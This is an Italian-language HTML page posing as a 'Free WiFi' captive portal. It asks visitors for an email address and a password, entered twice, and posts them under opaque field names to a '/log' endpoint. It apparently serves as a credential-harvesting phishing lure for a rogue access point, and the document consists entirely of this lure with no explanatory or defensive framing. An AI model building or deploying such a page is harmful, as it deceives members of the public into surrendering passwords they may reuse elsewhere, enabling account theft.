<!DOCTYPE html>
<html>
  <head>
    <title>Accedi</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
      body {
        background-color: #4949ff;
        font-family: arial, sans-serif;
        text-align: center;
        color: #ffffff;
      }
      .register {
        display: inline-block;
        margin-top: 50px;
        max-width: 350px;
        width: 100%;
      }
      h1, h3 {
        margin-bottom: -10px;
      }
      input {
        width: 90%;
        height: 36px;
        padding-left: 10px;
        background-color: #ffffff;
        border: 0px;
        border-radius: 18px;
        margin-bottom: 10px;
      }
      input[type=submit] {
        cursor: pointer;
        margin-top: 20px;
        background-color: #2424d2;
        font-weight: bold;
        color: #ffffff;
      }
      input:focus {
        box-shadow: inset 0px 0px 6px 2px rgba(191,191,191,1);
        outline: none;
      }
      input[type=submit]:hover, input[type=submit]:active {
        box-shadow: 0px 0px 18px -5px rgba(0,0,0,0.75);
        outline: none;
      }
    </style>
  </head>
  <body>
    <div class="register">
      <h1>Free WiFi</h1>
      <h3>Veloce, sicuro, gratuito</h3>
      <p>Per continuare a navigare senza limiti, registrati con un indirizzo e-mail valido</p>
      <form action="/log" method="POST">
        <input type="email" id="a" name="a" placeholder="Indirizzo e-mail" required>
        <input type="password" id="b" name="b" placeholder="Password" minlength="6" required>
        <input type="password" id="c" name="c" placeholder="Ripeti password" minlength="6" required>
        <input type="submit" value="Registrati">
      </form>
    </div>
  </body>
</html>
